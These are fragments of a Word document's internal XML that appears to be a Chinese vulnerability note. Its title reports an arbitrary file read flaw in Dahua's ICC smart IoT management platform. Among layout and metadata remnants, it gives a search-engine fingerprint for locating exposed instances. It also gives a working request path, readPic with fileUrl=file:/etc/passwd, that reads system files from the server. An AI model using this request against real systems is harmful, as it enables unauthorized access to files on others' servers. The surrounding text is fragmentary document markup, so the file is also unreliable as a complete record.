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浙江大华技术股份有限公司智能物联综合管理平台(ICC)存在任意文件读取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body="*客户端会小于800*"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3970" cy="2136140"/>
            <wp:effectExtent l="0" t="0" r="1143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5880" cy="252031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/evo-apigw/evo-cirs/file/readPic?fileUrl=file:/etc/passwd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2885" cy="3945255"/>
            <wp:effectExtent l="0" t="0" r="63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542891"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="365428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432331C3"/>
    <w:rsid w:val="6207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123</Characters>
  <Lines>0</Lines>
  <Paragraphs>0</Paragraphs>
  <TotalTime>1</TotalTime>
  <ScaleCrop>false</ScaleCrop>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>123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2023-10-31T13:18:14Z</dcterms:created>
  <dc:creator>wll</dc:creator>
  <cp:lastModifiedBy>----末悲</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-10-31T13:19:32Z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8C8ADAA2DD684A5B87EFD2AE7D871EB0_12</vt:lpwstr>
  </property>
</Properties>
</file>